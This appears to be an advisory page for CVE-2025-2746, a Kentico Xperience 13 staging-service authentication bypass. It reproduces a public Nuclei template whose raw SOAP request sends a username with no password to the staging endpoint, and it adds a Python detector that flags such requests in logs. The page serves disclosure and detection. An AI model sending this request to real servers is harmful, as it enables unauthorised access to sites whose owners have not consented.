CVE-2025-2746: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)

Date: 2025-08-01 | Affected software: Kentico Xperience CMS | PoC: public

Vulnerability description

Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin).

PoC code [public]

id: CVE-2025-2746

info:
  name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
  author: DhiyaneshDK
  severity: critical
  description: |
    Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
  reference:
    - https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
    - https://devnet.kentico.com/download/hotfixes
    - https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2746
    cwe-id: CWE-287
    epss-score: 0.8756
    epss-percentile: 0.99553
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Kentico-CMS"
  tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev

variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - raw:
      - |
        POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData

        <?xml version="1.0" encoding="utf-8"?>
            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
                <soap:Header>
                    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                        <wsse:UsernameToken>
                            <wsse:Username>admin</wsse:Username>
                        </wsse:UsernameToken>
                    </wsse:Security>
                </soap:Header>
                <soap:Body>
                    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
                        <stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
                    </ProcessSynchronizationTaskData>
                </soap:Body>
            </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rand}}"
          - "<wsa:Action>"
        condition: and

      - type: word
        part: body
        words:
          - "Site not running"
          - "SyncServer.ErrorLicense"
          - "SyncServer.ErrorServiceNotEnabled"
          - "Staging service is not enabled on this server"
          - "Staging does not work with blank password"
          - "Missing X509 certificate token"
          - "The security token could not be authenticated or authorized"
        condition: or
        negative: true

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4a0a0047304502202bbe76572f6c91fac37e669efc03bdfa1d4d83993a2e539404ce6682f878dd61022100f2dd1fe7a144e999b2c94946a958fcda9a93325f539586af8f843f42316efd5a:922c64590222798bb761d5b6d8e72950
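The request in the template above carries a WS-Security UsernameToken with a Username but no Password element. The following is an added detection helper for request logs or WAF captures, not part of the original page or of the Nuclei project; it assumes a legitimate staging client always sends a Password element in its UsernameToken (or an X509 token instead), which the template's own error-string matchers ("Staging does not work with blank password", "Missing X509 certificate token") suggest. Sample requests are constructed.

```python
import xml.etree.ElementTree as ET

WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
STAGING_NS = "http://localhost/SyncWebService/SyncServer"
STAGING_PATH = "/cmspages/staging/syncserver.asmx"


def inspect_staging_request(path: str, body: str) -> dict:
    """Classify one captured request by URL path and SOAP body.

    Flags a ProcessSynchronizationTaskData call whose UsernameToken has a
    Username but no Password element (assumption: real staging clients send
    a Password, or authenticate with an X509 token and no UsernameToken)."""
    verdict = {"staging_endpoint": path.lower() == STAGING_PATH,
               "username": None, "has_password": None, "suspicious": False}
    if not verdict["staging_endpoint"]:
        return verdict
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        verdict["suspicious"] = True  # unparseable SOAP at an auth endpoint is worth review
        return verdict
    token = root.find(f".//{{{WSSE}}}UsernameToken")
    if token is None:
        return verdict  # no username token: X509 path or unrelated call, out of scope here
    body_el = root.find(f"{{{SOAP}}}Body")
    task_call = body_el is not None and \
        body_el.find(f"{{{STAGING_NS}}}ProcessSynchronizationTaskData") is not None
    user = token.find(f"{{{WSSE}}}Username")
    verdict["username"] = (user.text or "").strip() if user is not None else ""
    verdict["has_password"] = token.find(f"{{{WSSE}}}Password") is not None
    verdict["suspicious"] = task_call and not verdict["has_password"]
    return verdict


# Constructed samples: PROBE mirrors the template's request, LEGIT adds a password.
PROBE = (f'<soap:Envelope xmlns:soap="{SOAP}"><soap:Header>'
         f'<wsse:Security xmlns:wsse="{WSSE}"><wsse:UsernameToken>'
         '<wsse:Username>admin</wsse:Username></wsse:UsernameToken>'
         '</wsse:Security></soap:Header><soap:Body>'
         f'<ProcessSynchronizationTaskData xmlns="{STAGING_NS}">'
         '<stagingTaskData><![CDATA[<abc>]]></stagingTaskData>'
         '</ProcessSynchronizationTaskData></soap:Body></soap:Envelope>')
LEGIT = PROBE.replace('</wsse:Username>',
                      '</wsse:Username><wsse:Password>REDACTED</wsse:Password>')

if __name__ == "__main__":
    for name, sample in (("probe", PROBE), ("legit", LEGIT)):
        print(name, inspect_staging_request("/CMSPages/Staging/SyncServer.asmx", sample))
```

Pair a hit with the hotfix level from the description above: below Hotfix 173 any username is enough, so the username field is not a useful filter there.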
